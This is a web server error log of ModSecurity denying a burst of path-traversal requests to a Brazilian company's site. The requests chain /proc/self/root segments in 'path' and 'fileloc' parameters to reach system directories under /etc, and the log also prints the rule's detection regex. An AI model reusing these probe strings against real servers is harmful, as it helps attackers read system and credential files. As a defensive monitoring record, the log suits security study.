[Tue Mar 17 10:41:52.763163 2026] [:error] [pid 7437:tid 140411557287680] [client 74.7.243.203:48070] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablaIAeiSKl8TjouI-YIdAAAA9Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:41:55.133312 2026] [:error] [pid 7437:tid 140411733534464] [client 74.7.243.203:48070] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablaIweiSKl8TjouI-YIeQAAA8E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:41:57.502391 2026] [:error] [pid 2473:tid 140411725141760] [client 74.7.243.203:48082] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablaJaBJNF7axNlVR0UDwAAAAAI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:42:01.030484 2026] [:error] [pid 18380:tid 140411574073088] [client 74.7.243.203:48098] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablaKa4xEDsg_V3ESNY6pgAAAhQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:42:03.630459 2026] [:error] [pid 18709:tid 140411741927168] [client 74.7.243.203:35394] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablaKzarLhPAjZGI1b20_AAAA4A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:42:04.375053 2026] [:error] [pid 2325:tid 140411725141760] [client 74.7.241.46:48828] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/chrony.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablaLO82sZHvlq4xgHrKVwAAAoI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 10:42:10.456287 2026] [:error] [pid 17965:tid 140411733534464] [client 74.7.243.203:35408] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablaMqt8Nd0UC_OcbVG2VAAAAIE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:42:12.869097 2026] [:error] [pid 1731:tid 140411725141760] [client 74.7.243.203:56902] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablaNAb2qCuy5irgBMjPRwAAAEI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:42:14.173793 2026] [:error] [pid 1731:tid 140411649607424] [client 74.7.243.203:56908] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablaNgb2qCuy5irgBMjPSQAAAEs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:42:15.328647 2026] [:error] [pid 18380:tid 140411624429312] [client 74.7.243.203:56922] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablaN64xEDsg_V3ESNY6qQAAAg4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:42:17.793289 2026] [:error] [pid 18380:tid 140411607643904] [client 74.7.243.203:56930] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablaOa4xEDsg_V3ESNY6qwAAAhA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:42:19.098894 2026] [:error] [pid 1731:tid 140411733534464] [client 74.7.243.203:56932] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablaOwb2qCuy5irgBMjPTwAAAEE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:42:21.282572 2026] [:error] [pid 11293:tid 140411616036608] [client 74.7.243.203:38930] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablaPNCmCSWTlPouqorTPQAAAM8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:42:27.911502 2026] [:error] [pid 1731:tid 140411649607424] [client 74.7.243.203:38938] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablaQwb2qCuy5irgBMjPWQAAAEs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:42:29.804787 2026] [:error] [pid 11293:tid 140411641214720] [client 74.7.243.203:38954] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablaRdCmCSWTlPouqorTRQAAAMw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:42:31.255668 2026] [:error] [pid 7437:tid 140411708356352] [client 74.7.243.203:43682] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablaRweiSKl8TjouI-YIhQAAA8Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:42:32.568133 2026] [:error] [pid 2325:tid 140411666392832] [client 74.7.243.203:43686] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablaSO82sZHvlq4xgHrKWgAAAok"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:42:33.937117 2026] [:error] [pid 11293:tid 140411658000128] [client 74.7.243.203:43696] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablaSdCmCSWTlPouqorTSwAAAMo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:42:35.160071 2026] [:error] [pid 2325:tid 140411548894976] [client 74.7.243.203:43706] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablaS-82sZHvlq4xgHrKXgAAApc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:42:36.502160 2026] [:error] [pid 17965:tid 140411716749056] [client 74.7.243.203:43710] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablaTKt8Nd0UC_OcbVG2VwAAAIM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:42:39.012031 2026] [:error] [pid 17965:tid 140411666392832] [client 74.7.243.203:43716] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablaTat8Nd0UC_OcbVG2WQAAAIk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 10:42:40.552746 2026] [:error] [pid 18604:tid 140411683178240] [client 74.7.243.203:50672] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablaUEBd0UqwxWindINvIAAAA0c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
